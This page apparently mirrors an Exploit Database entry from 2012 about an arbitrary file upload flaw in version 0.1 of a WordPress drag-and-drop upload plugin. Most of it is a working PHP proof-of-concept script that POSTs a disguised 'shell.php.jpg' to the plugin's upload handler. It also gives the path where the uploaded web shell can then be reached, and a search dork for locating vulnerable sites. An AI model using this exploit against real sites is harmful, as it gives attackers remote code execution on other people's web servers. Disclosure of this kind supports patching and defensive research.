WordPress Plugin drag and drop file upload 0.1 – Arbitrary File Upload

• Exploit Database
• 115 阅读

• 作者： Adrien Thierry
  日期： 2012-06-11
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/19057/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32

  ########################################################### # # Exploit Title: WordPress drag and drop file upload 0.1 Arbitrary File Upload # Google Dork: inurl:wp-content/plugins/drag-drop-file-uploader/ # Date: 11/06/2012 # Exploit Author: Adrien Thierry # Vendor Homepage:http://www.ali.dj/ # Software Link: http://downloads.wordpress.org/plugin/drag-drop-file-uploader.0.1.zip # Version: 0.1 # ###########################################################   Vuln page : http://mysite.com/wp-content/plugins/drag-drop-file-uploader/dnd-upload.php   exploit :   <?php $u="shell.php.jpg"; $c = curl_init("http://127.0.0.1/wp/wp-content/plugins/drag-drop-file-uploader/dnd-upload.php"); curl_setopt($c, CURLOPT_POST, true); curl_setopt($c, CURLOPT_POSTFIELDS, array(&apos;file&apos;=>"@$u")); curl_setopt($c, CURLOPT_RETURNTRANSFER, 1); $e = curl_exec($c); curl_close($c); echo $e; ?>   Shell access : http://mysite.com/wp-content/uploads/[YYYY]/[MM]/shell.php.jpg   #####################################################################